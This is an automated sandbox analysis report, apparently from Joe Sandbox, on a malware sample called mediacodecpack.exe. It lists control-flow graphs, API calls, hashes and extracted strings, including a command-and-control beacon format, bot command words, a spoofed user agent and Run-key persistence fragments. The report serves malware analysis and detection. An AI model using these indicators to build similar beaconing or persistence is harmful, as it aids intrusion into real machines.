                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _malloc$Heap$AllocateProcess$AddressHandleModuleProc$CountCriticalInitializeSectionTickVersion_memset
                                                                                • String ID: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$Q!V$gpt=%.8x&advizor=%d&box=%d&hp=%x&lp=%x&line=%d&os=%d.%d.%04d&flag=%d&itd=%d$ntdll.dll$sprintf$strcat
                                                                                • API String ID: 3007647348-38596970
                                                                                • Opcode ID: cf09fda83790b39788aed6b35a50506515b38a7240b497aa0992d3ae5535322e
                                                                                • Instruction ID: 1c3b84984da3b097bbb5cd9001afc56006854e97e27a9c11a7df92c2a20bc423
                                                                                • Opcode Fuzzy Hash: cf09fda83790b39788aed6b35a50506515b38a7240b497aa0992d3ae5535322e
                                                                                • Instruction Fuzzy Hash: 89A1F372948340ABD311AF34B884B5BBBE4EF5A314F55085EE68897381DB748C19CBA6

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 126 2d0642f-2d06448 127 2d06464-2d0646e 126->127 128 2d0644a-2d06450 126->128 131 2d060f0-2d060f2 127->131 132 2d06474-2d06498 call 2d13760 call 2d0439c 127->132 129 2d06452-2d06454 128->129 130 2d06456-2d06463 call 2d0534d 128->130 129->127 130->127 133 2d060f4-2d060f9 131->133 134 2d060fb-2d060fd 131->134 132->131 146 2d0649e-2d064c9 RtlEnterCriticalSection RtlLeaveCriticalSection call 2d1134c 132->146 138 2d06104 Sleep 133->138 139 2d0610a-2d06139 RtlEnterCriticalSection RtlLeaveCriticalSection 134->139 140 2d060ff 134->140 138->139 143 2d0613d-2d06161 139->143 140->138 147 2d06163-2d06174 143->147 148 2d060f5-2d060f9 143->148 151 2d06513-2d0652b call 2d1134c 146->151 152 2d064cb-2d064da call 2d1134c 146->152 147->143 148->138 157 2d06531-2d06533 151->157 158 2d067d2-2d067e1 call 2d1134c 151->158 152->151 159 2d064dc-2d064eb call 2d1134c 152->159 157->158 161 2d06539-2d065e4 call 2d11fbc RtlEnterCriticalSection RtlLeaveCriticalSection call 2d13760 * 5 call 2d0439c * 2 157->161 166 2d067e3-2d067e5 158->166 167 2d06826-2d06835 call 2d1134c 158->167 159->151 169 2d064ed-2d064fc call 2d1134c 159->169 211 2d06621 161->211 212 2d065e6-2d065e8 161->212 166->167 170 2d067e7-2d06821 call 2d13760 RtlEnterCriticalSection RtlLeaveCriticalSection 166->170 180 2d06837-2d06840 call 2d05c11 call 2d05d1f 167->180 181 2d0684a-2d06859 call 2d1134c 167->181 169->151 182 2d064fe-2d0650d call 2d1134c 169->182 170->131 194 2d06845 180->194 181->131 192 2d0685f-2d06861 181->192 182->131 182->151 192->131 195 2d06867-2d06880 call 2d0439c 192->195 194->131 195->131 202 2d06886-2d06955 call 2d11428 call 2d01ba7 195->202 213 2d06957 call 2d0143f 202->213 214 2d0695c-2d0697d RtlEnterCriticalSection 202->214 219 2d06625-2d06653 call 2d11fbc call 2d13760 call 2d0439c 211->219 212->211 218 2d065ea-2d065fc call 2d1134c 212->218 213->214 216 2d06989-2d069f0 RtlLeaveCriticalSection call 2d03c67 call 2d03d7e call 2d0733f 214->216 217 2d0697f-2d06986 214->217 239 2d069f6-2d06a38 call 2d09729 216->239 240 2d06b58-2d06b6c call 2d08007 216->240 217->216 218->211 228 2d065fe-2d0661f call 2d0439c 218->228 237 2d06694-2d0669d call 2d11f84 219->237 238 2d06655-2d06664 call 2d125f6 219->238 228->219 249 2d067c0-2d067cd 237->249 250 2d066a3-2d066bb call 2d127c5 237->250 238->237 251 2d06666 238->251 252 2d06b22-2d06b33 call 2d073ee 239->252 253 2d06a3e-2d06a45 239->253 240->131 249->131 263 2d066c7 250->263 264 2d066bd-2d066c5 call 2d0873b 250->264 255 2d0666b-2d0667d call 2d11860 251->255 260 2d06b38-2d06b53 call 2d033b2 252->260 257 2d06a48-2d06a4d 253->257 270 2d06682-2d06692 call 2d125f6 255->270 271 2d0667f 255->271 257->257 261 2d06a4f-2d06a94 call 2d09729 257->261 260->240 261->252 272 2d06a9a-2d06aa0 261->272 269 2d066c9-2d06757 call 2d09853 call 2d03863 call 2d05119 call 2d03863 call 2d09af9 call 2d09c13 263->269 264->269 294 2d0675c-2d0676d 269->294 270->237 270->255 271->270 277 2d06aa3-2d06aa8 272->277 277->277 279 2d06aaa-2d06ae5 call 2d09729 277->279 279->252 286 2d06ae7-2d06b1b call 2d0c11b 279->286 290 2d06b20-2d06b21 286->290 290->252 295 2d06774-2d0679f Sleep call 2d10900 294->295 296 2d0676f call 2d0380b 294->296 300 2d067a1-2d067aa call 2d04100 295->300 301 2d067ab-2d067b9 295->301 296->295 300->301 301->249 302 2d067bb call 2d0380b 301->302 302->249
                                                                                APIs
                                                                                • Sleep.KERNELBASE(0000EA60), ref: 02D06104
                                                                                • RtlEnterCriticalSection.NTDLL(02D34FD0), ref: 02D0610F
                                                                                • RtlLeaveCriticalSection.NTDLL(02D34FD0), ref: 02D06120
                                                                                  • Part of subcall function 02D127C5: _malloc.LIBCMT ref: 02D127DD
                                                                                • _memset.LIBCMT ref: 02D06480
                                                                                • RtlEnterCriticalSection.NTDLL(02D34FD0), ref: 02D064A3
                                                                                • RtlLeaveCriticalSection.NTDLL(02D34FD0), ref: 02D064B4
                                                                                • _malloc.LIBCMT ref: 02D0653B
                                                                                • RtlEnterCriticalSection.NTDLL(02D34FD0), ref: 02D0654D
                                                                                • RtlLeaveCriticalSection.NTDLL(02D34FD0), ref: 02D06559
                                                                                • _memset.LIBCMT ref: 02D06573
                                                                                • _memset.LIBCMT ref: 02D06582
                                                                                • _memset.LIBCMT ref: 02D06592
                                                                                • _memset.LIBCMT ref: 02D065A1
                                                                                • _memset.LIBCMT ref: 02D065B0
                                                                                • _malloc.LIBCMT ref: 02D0662A
                                                                                • _memset.LIBCMT ref: 02D0663B
                                                                                • _strtok.LIBCMT ref: 02D0665B
                                                                                • _swscanf.LIBCMT ref: 02D06672
                                                                                • _strtok.LIBCMT ref: 02D06689
                                                                                • _free.LIBCMT ref: 02D06695
                                                                                • Sleep.KERNEL32(000007D0), ref: 02D06779
                                                                                • _memset.LIBCMT ref: 02D067F2
                                                                                • RtlEnterCriticalSection.NTDLL(02D34FD0), ref: 02D067FF
                                                                                • RtlLeaveCriticalSection.NTDLL(02D34FD0), ref: 02D06811
                                                                                  • Part of subcall function 02D0873B: __EH_prolog.LIBCMT ref: 02D08740
                                                                                  • Part of subcall function 02D0873B: RtlEnterCriticalSection.NTDLL(00000020), ref: 02D087BB
                                                                                  • Part of subcall function 02D0873B: RtlLeaveCriticalSection.NTDLL(00000020), ref: 02D087D9
                                                                                • _sprintf.LIBCMT ref: 02D0689B
                                                                                • RtlEnterCriticalSection.NTDLL(00000020), ref: 02D06960
                                                                                • RtlLeaveCriticalSection.NTDLL(00000020), ref: 02D06994
                                                                                  • Part of subcall function 02D05C11: _malloc.LIBCMT ref: 02D05C1F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSection$_memset$EnterLeave$_malloc$Sleep_strtok$H_prolog_free_sprintf_swscanf
                                                                                • String ID: $%d;$<htm$Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$auth_ip$auth_swith$block$connect$disconnect$idle$updips$updurls
                                                                                • API String ID: 3337033272-2823103634
                                                                                • Opcode ID: 9f82c2e4ea22b7ec837440fbffef114cad0af33e7eeb91ea3afd2faf8eda8aa8
                                                                                • Instruction ID: 3fe8e6fb2bd157b0ff9249ee85ddce8780aac64f0d709569acb32d05eccd6923
                                                                                • Opcode Fuzzy Hash: 9f82c2e4ea22b7ec837440fbffef114cad0af33e7eeb91ea3afd2faf8eda8aa8
                                                                                • Instruction Fuzzy Hash: DD1223315483819BE7359B24E890BAFB7E9EFC5318F14481DE589877E1DB709C08CBA2

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 02D01D11
                                                                                • GetLastError.KERNEL32 ref: 02D01D23
                                                                                  • Part of subcall function 02D01712: __EH_prolog.LIBCMT ref: 02D01717
                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 02D01D59
                                                                                • GetLastError.KERNEL32 ref: 02D01D6B
                                                                                • __beginthreadex.LIBCMT ref: 02D01DB1
                                                                                • GetLastError.KERNEL32 ref: 02D01DC6
                                                                                • CloseHandle.KERNEL32(00000000), ref: 02D01DDD
                                                                                • CloseHandle.KERNEL32(00000000), ref: 02D01DEC
                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02D01E14
                                                                                • CloseHandle.KERNEL32(00000000), ref: 02D01E1B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseErrorHandleLast$CreateEvent$H_prologObjectSingleWait__beginthreadex
                                                                                • String ID: thread$thread.entry_event$thread.exit_event
                                                                                • API String ID: 831262434-3017686385
                                                                                • Opcode ID: e05115f24cbbe98a7ee3b5c02b04cf28dfa4bd6a5739515501e2938392e192d2
                                                                                • Instruction ID: 6311895c399d0e5cbd4e2a5bb21212539e2f65e22fa786a886dc653dd3a2c729
                                                                                • Opcode Fuzzy Hash: e05115f24cbbe98a7ee3b5c02b04cf28dfa4bd6a5739515501e2938392e192d2
                                                                                • Instruction Fuzzy Hash: 15316771A003019FD710EF24D888B2BBBA5EF84750F204969F8598B3A0DB70DC49CFA2

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • __EH_prolog.LIBCMT ref: 02D04D8B
                                                                                • RtlEnterCriticalSection.NTDLL(02D34FD0), ref: 02D04DB7
                                                                                • RtlLeaveCriticalSection.NTDLL(02D34FD0), ref: 02D04DC3
                                                                                  • Part of subcall function 02D04BED: __EH_prolog.LIBCMT ref: 02D04BF2
                                                                                  • Part of subcall function 02D04BED: InterlockedExchange.KERNEL32(?,00000000), ref: 02D04CF2
                                                                                • RtlEnterCriticalSection.NTDLL(02D34FD0), ref: 02D04E93
                                                                                • RtlLeaveCriticalSection.NTDLL(02D34FD0), ref: 02D04E99
                                                                                • RtlEnterCriticalSection.NTDLL(02D34FD0), ref: 02D04EA0
                                                                                • RtlLeaveCriticalSection.NTDLL(02D34FD0), ref: 02D04EA6
                                                                                • RtlEnterCriticalSection.NTDLL(02D34FD0), ref: 02D050A7
                                                                                • RtlLeaveCriticalSection.NTDLL(02D34FD0), ref: 02D050AD
                                                                                • RtlEnterCriticalSection.NTDLL(02D34FD0), ref: 02D050B8
                                                                                • RtlLeaveCriticalSection.NTDLL(02D34FD0), ref: 02D050C1
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSection$EnterLeave$H_prolog$ExchangeInterlocked
                                                                                • String ID:
                                                                                • API String ID: 2062355503-0
                                                                                • Opcode ID: b05f6bcd66ae18ef7c9654cd26d6502658de061f7b8e983614f219388c18e583
                                                                                • Instruction ID: 90b3c5d75af9a7c42a4dca3d509e61ee09614d58600bb8c234fdce4a2fc3c448
                                                                                • Opcode Fuzzy Hash: b05f6bcd66ae18ef7c9654cd26d6502658de061f7b8e983614f219388c18e583
                                                                                • Instruction Fuzzy Hash: D8B14A71D0421D9FEF25DFA0D890BEEBBB5EF04318F24405AE81566290DBB45E49CFA1

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 407 401301-40135e FindResourceA 408 401360-401362 407->408 409 401367-40137d SizeofResource 407->409 410 401538-40153c 408->410 411 401386-4013fe LoadResource LockResource GlobalAlloc call 402490 * 2 409->411 412 40137f-401381 409->412 417 401407-40140b 411->417 412->410 418 40140d-40141d 417->418 419 40141f-401428 GetTickCount 417->419 418->417 421 401491-401499 419->421 422 40142a-40142e 419->422 425 4014a2-4014a8 421->425 423 401430-401438 422->423 424 40148f 422->424 426 401441-401447 423->426 427 4014f0-401525 GlobalAlloc call 401000 424->427 425->427 428 4014aa-4014e8 425->428 432 401449-401485 426->432 433 40148d 426->433 435 40152a-401535 427->435 429 4014ea 428->429 430 4014ee 428->430 429->430 430->425 436 401487 432->436 437 40148b 432->437 433->422 435->410 436->437 437->426
                                                                                APIs
                                                                                • FindResourceA.KERNEL32(?,0000000A), ref: 00401351
                                                                                • SizeofResource.KERNEL32(00000000), ref: 00401370
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2567390961.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.2567390961.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: Resource$FindSizeof
                                                                                • String ID:
                                                                                • API String ID: 3019604839-3916222277
                                                                                • Opcode ID: d05602b0e20a881077e161112d5bd34232c8f71c7560e683aad862cf59917e15
                                                                                • Instruction ID: 779852d327d389dbbb2f1b261a2bb7141e3a4eae573781fe7d13a424a4f3f89b
                                                                                • Opcode Fuzzy Hash: d05602b0e20a881077e161112d5bd34232c8f71c7560e683aad862cf59917e15
                                                                                • Instruction Fuzzy Hash: F1811075D04258DFDF01CFE8D985AEEBBB0BF09305F1400AAE581B7262C3385A84DB69

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • RtlEnterCriticalSection.NTDLL(?), ref: 02D02706
                                                                                • CreateWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 02D0272B
                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02D23173), ref: 02D02738
                                                                                  • Part of subcall function 02D01712: __EH_prolog.LIBCMT ref: 02D01717
                                                                                • SetWaitableTimer.KERNELBASE(?,?,000493E0,00000000,00000000,00000000), ref: 02D02778
                                                                                • RtlLeaveCriticalSection.NTDLL(?), ref: 02D027D9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSectionTimerWaitable$CreateEnterErrorH_prologLastLeave
                                                                                • String ID: timer
                                                                                • API String ID: 4293676635-1792073242
                                                                                • Opcode ID: 8f51ef5159fd5189b3b12bf0f472f90af73f4909c5e9ae176deb8a75fd3b73a5
                                                                                • Instruction ID: 428126473e184f2cd866cc0160862e9c85a41ba93649291c4239bceaca6d7d8a
                                                                                • Opcode Fuzzy Hash: 8f51ef5159fd5189b3b12bf0f472f90af73f4909c5e9ae176deb8a75fd3b73a5
                                                                                • Instruction Fuzzy Hash: 6B319CB1805715AFD310DF25E988B26BBA8FB88725F104A2EF85582B90D770EC14CFA5

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 490 401e4e-401e4f 491 401e51-401e54 490->491 492 401e22-401e37 490->492 493 401e56-401e7e LoadLibraryExA 491->493 494 401eca-401ed6 491->494 495 40dc1b-40dc22 492->495 493->494 496 401dd0 493->496 497 40207f-40d1c2 494->497 498 40de67 495->498 500 401dd6-402282 496->500 501 401f6b-401fa1 496->501 502 40d9ae 497->502 503 40de6a 498->503 500->498 501->497 501->502 502->495 503->503
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2567390961.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.2567390961.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: LibraryLoad
                                                                                • String ID: Curr$entV$ersi$on\R$ows\
                                                                                • API String ID: 1029625771-1474489434
                                                                                • Opcode ID: f444551602b2b86e4a4a20a609321a93c0450eb734b73b7cbcf43e92de4f6f8f
                                                                                • Instruction ID: f023023372e99afa5c1116a4d80dcbe190962e31142eb026a9c01bd4ea8a2df4
                                                                                • Opcode Fuzzy Hash: f444551602b2b86e4a4a20a609321a93c0450eb734b73b7cbcf43e92de4f6f8f
                                                                                • Instruction Fuzzy Hash: 9D219270D14625CFCB04DFA8CD85AEDB7B1BB05B00F14856AE0127B7E1C378A842DB4A

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 589 2d01ba7-2d01bcf call 2d22a10 RtlEnterCriticalSection 592 2d01bd1 589->592 593 2d01be9-2d01bf7 RtlLeaveCriticalSection call 2d0d334 589->593 594 2d01bd4-2d01be0 call 2d01b79 592->594 596 2d01bfa-2d01c20 RtlEnterCriticalSection 593->596 601 2d01be2-2d01be7 594->601 602 2d01c55-2d01c6e RtlLeaveCriticalSection 594->602 598 2d01c34-2d01c36 596->598 599 2d01c22-2d01c2f call 2d01b79 598->599 600 2d01c38-2d01c43 598->600 603 2d01c45-2d01c4b 599->603 607 2d01c31 599->607 600->603 601->593 601->594 603->602 605 2d01c4d-2d01c51 603->605 605->602 607->598
                                                                                APIs
                                                                                • __EH_prolog.LIBCMT ref: 02D01BAC
                                                                                • RtlEnterCriticalSection.NTDLL ref: 02D01BBC
                                                                                • RtlLeaveCriticalSection.NTDLL ref: 02D01BEA
                                                                                • RtlEnterCriticalSection.NTDLL ref: 02D01C13
                                                                                • RtlLeaveCriticalSection.NTDLL ref: 02D01C56
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSection$EnterLeave$H_prolog
                                                                                • String ID:
                                                                                • API String ID: 1633115879-0
                                                                                • Opcode ID: fe3bc1df7315055b2453046bdc45cd5239903debea9cd8cf42f5a026c45ce903
                                                                                • Instruction ID: 8987da278a5e9efdab85a499f483ae00d0b450cdc4555328a8e5e6d05366befc
                                                                                • Opcode Fuzzy Hash: fe3bc1df7315055b2453046bdc45cd5239903debea9cd8cf42f5a026c45ce903
                                                                                • Instruction Fuzzy Hash: 4321CA71A002049FCB14CF68D884BAABBB5FF48724F218549E80997340D771ED09CBE0

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 609 402149-40214c 610 4021bd-4021c3 609->610 611 40214d-40214e 609->611 610->609 614 4021c5-4021c6 610->614 612 402150-402163 611->612 613 402139-402140 611->613 617 40e040 612->617 615 402142-402147 613->615 616 402109-40210b 613->616 618 4021d5-4021da 614->618 619 4021c8-4021d4 614->619 615->609 616->613 622 40e043 617->622 620 402171-40d643 618->620 621 4021dc-4021de 618->621 619->618 626 40d955-40e095 OpenSCManagerA 620->626 624 4021e0-40d9f1 621->624 625 402223 CopyFileA 621->625 622->622 624->617 628 402229-40222d 625->628 632 40e09b 626->632 633 4021ed-4021f9 626->633 628->626 634 40e09c 632->634 633->628 634->634
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2567390961.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.2567390961.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: KCU:$h "H
                                                                                • API String ID: 0-3841667563
                                                                                • Opcode ID: 70e05740465bff6623fe55717a1e0cb7cab08e4fdb1563974d3bfdd56af563f9
                                                                                • Instruction ID: 63b4f081242afd7d5de53f06e14c51bfbfcc0f1bc0993d0d4b68f313483703d4
                                                                                • Opcode Fuzzy Hash: 70e05740465bff6623fe55717a1e0cb7cab08e4fdb1563974d3bfdd56af563f9
                                                                                • Instruction Fuzzy Hash: 25112971848212DFD3124F909B592A677B1EB12300F24543B8582AB2D2C2BD4A4BD78F

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 635 2d0615e-2d06161 636 2d06163-2d06174 635->636 637 2d060f5-2d06139 Sleep RtlEnterCriticalSection RtlLeaveCriticalSection 635->637 639 2d0613d-2d06149 636->639 637->639 639->635
                                                                                APIs
                                                                                • Sleep.KERNELBASE(0000EA60), ref: 02D06104
                                                                                • RtlEnterCriticalSection.NTDLL(02D34FD0), ref: 02D0610F
                                                                                • RtlLeaveCriticalSection.NTDLL(02D34FD0), ref: 02D06120
                                                                                Strings
                                                                                • Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US), xrefs: 02D06129
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSection$EnterLeaveSleep
                                                                                • String ID: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                • API String ID: 1566154052-1923541051
                                                                                • Opcode ID: 670ea56000eab9fa923fa3ab367a6cbb117a67ca94bb37b67e053ea576176aed
                                                                                • Instruction ID: 65f5fe46cb6affa6cc51aa4e466bdf616f1c285f5a7376cef753a27859178b9c
                                                                                • Opcode Fuzzy Hash: 670ea56000eab9fa923fa3ab367a6cbb117a67ca94bb37b67e053ea576176aed
                                                                                • Instruction Fuzzy Hash: E3F0282188C3C08FD7038770BC58B653F706F5B214B0A04C7E4C59B393C1985C19C3A2

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetVersion.KERNEL32 ref: 00402A46
                                                                                  • Part of subcall function 00403B64: HeapCreate.KERNELBASE(00000000,00001000,00000000,00402A7F,00000000), ref: 00403B75
                                                                                  • Part of subcall function 00403B64: HeapDestroy.KERNEL32 ref: 00403BB4
                                                                                • GetCommandLineA.KERNEL32 ref: 00402A94
                                                                                • GetStartupInfoA.KERNEL32(?), ref: 00402ABF
                                                                                • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00402AE2
                                                                                  • Part of subcall function 00402B3B: ExitProcess.KERNEL32 ref: 00402B58
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2567390961.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.2567390961.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$CommandCreateDestroyExitHandleInfoLineModuleProcessStartupVersion
                                                                                • String ID:
                                                                                • API String ID: 2057626494-0
                                                                                • Opcode ID: 81c04d43b3f46c58329c6832fe0805ef85b64df99fa32ea28edf2ad19d5a1781
                                                                                • Instruction ID: 5f87248e4510ca7a7a053da507506fe2897125482441b09741c869e2758f94b2
                                                                                • Opcode Fuzzy Hash: 81c04d43b3f46c58329c6832fe0805ef85b64df99fa32ea28edf2ad19d5a1781
                                                                                • Instruction Fuzzy Hash: BA214CB19006159ADB04AFA6DE49A6E7FA8EB04715F10413FF905BB2D1DB384900CA6C
                                                                                APIs
                                                                                • WSASetLastError.WS2_32(00000000), ref: 02D02EEE
                                                                                • WSASocketA.WS2_32(?,?,?,00000000,00000000,00000001), ref: 02D02EFD
                                                                                • WSAGetLastError.WS2_32(?,?,?,00000000,00000000,00000001), ref: 02D02F0C
                                                                                • setsockopt.WS2_32(00000000,00000029,0000001B,00000000,00000004), ref: 02D02F36
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLast$Socketsetsockopt
                                                                                • String ID:
                                                                                • API String ID: 2093263913-0
                                                                                • Opcode ID: 8f057ca1020cec8827ce8d0ff83b6db77ef6c77baeea551aa78032606f323ddd
                                                                                • Instruction ID: 7d4a8d4c1bfb36ca5cce7ba82b3056fc202a4d0f14d51e238c70713616e69c0e
                                                                                • Opcode Fuzzy Hash: 8f057ca1020cec8827ce8d0ff83b6db77ef6c77baeea551aa78032606f323ddd
                                                                                • Instruction Fuzzy Hash: E201B171A01214BBDB309F66DC88F9BBBA9EB85771F008565F918CB290CB708C00CBA0
                                                                                APIs
                                                                                  • Part of subcall function 02D02D39: WSASetLastError.WS2_32(00000000), ref: 02D02D47
                                                                                  • Part of subcall function 02D02D39: WSASend.WS2_32(?,?,?,?,00000000,00000000,00000000), ref: 02D02D5C
                                                                                • WSASetLastError.WS2_32(00000000), ref: 02D02E6D
                                                                                • select.WS2_32(?,00000000,00000001,00000000,00000000), ref: 02D02E83
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLast$Sendselect
                                                                                • String ID: 3'
                                                                                • API String ID: 2958345159-280543908
                                                                                • Opcode ID: 8c700fdc4cd78ec1d240b8db9553ec3c85fbcf24b6b7a7e9098d51b3fa3666e8
                                                                                • Instruction ID: 038045d8e0538874623acb8d9842fbc0b394119dbddeb2477b56d4b06765c1ff
                                                                                • Opcode Fuzzy Hash: 8c700fdc4cd78ec1d240b8db9553ec3c85fbcf24b6b7a7e9098d51b3fa3666e8
                                                                                • Instruction Fuzzy Hash: E23169B0A022099EDB10AFA0D89C7EEBBAAEF04354F10455A9C14973E0EB749D54CFA0
                                                                                APIs
                                                                                • WSASetLastError.WS2_32(00000000), ref: 02D02AEA
                                                                                • connect.WS2_32(?,?,?), ref: 02D02AF5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLastconnect
                                                                                • String ID: 3'
                                                                                • API String ID: 374722065-280543908
                                                                                • Opcode ID: 43b5ff4b84a55ef060bca43ab5b7eead08e53536f96e862d1657252bb8f9c062
                                                                                • Instruction ID: e71c282910dca67e966636f979866742bf19371fb93042c17ba4e0a7f0124af9
                                                                                • Opcode Fuzzy Hash: 43b5ff4b84a55ef060bca43ab5b7eead08e53536f96e862d1657252bb8f9c062
                                                                                • Instruction Fuzzy Hash: F8218374E01204ABCF24AFA4D4987AEBBBAEF44324F504199DC18973D0DB744E05CFA1
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prolog
                                                                                • String ID:
                                                                                • API String ID: 3519838083-0
                                                                                • Opcode ID: 4b6cdcea9a2a0c4e466e09cace54aa436c3c3068eb854c73d0ee2064a8c6d930
                                                                                • Instruction ID: c40a0c48c868d3eef360340e265be7c9cbd2e7ecc721d5a9bc0f63eee5d74269
                                                                                • Opcode Fuzzy Hash: 4b6cdcea9a2a0c4e466e09cace54aa436c3c3068eb854c73d0ee2064a8c6d930
                                                                                • Instruction Fuzzy Hash: 15513A71904256DFCB58DF68D5957AABBB1FF08320F10819AE8699B3A0D774DD10CFA0
                                                                                APIs
                                                                                Strings
                                                                                • C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe, xrefs: 0040D655
                                                                                Memory Dump Source
